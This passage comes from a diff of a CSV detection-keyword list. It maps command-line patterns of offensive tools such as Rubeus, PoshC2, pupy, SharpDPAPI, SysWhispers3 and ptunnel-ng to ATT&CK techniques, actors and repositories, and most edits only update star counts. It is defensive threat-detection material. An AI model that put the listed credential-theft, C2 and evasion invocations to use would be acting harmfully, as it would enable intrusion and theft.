","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "* port-states.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* PoshC2 *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -PoshC2Dir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -PoshC2Dir *","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* PoshC2 *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -PoshC2Dir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -PoshC2Dir *","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "* pptp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* preauthscan /users:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* preauthscan /users:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* prepare.sh shell/mod_*.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "* --preset all -o syscalls_all*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" "* --preset common -o syscalls_common*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" -"* PrincipalsAllowedToDelegateToAccount *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* PrincipalsAllowedToDelegateToAccount *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* Priv_Esc.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"* --priv-esc*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --priv-esc*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* Process spawned with stolen token!*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "* --propagated*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* proxychains *","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" -"* ps /target:*.xml /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"* ptt /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* ps /target:*.xml /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* ptt /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* ptunnel-ng*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "* --publickey * --ecmdigits 25 --verbose --private*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --publickey * --uncipherfile ./ciphered\_file*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* puppet-naivesigning.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* PupyCredentials*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* pupylib.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupySocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyTCPClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyTCPServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyWebServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyWebSocketClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyWebSocketServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* pupyx64.lin*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* push_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyCredentials*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* pupylib.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupySocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyTCPClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyTCPServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebSocketClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebSocketServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 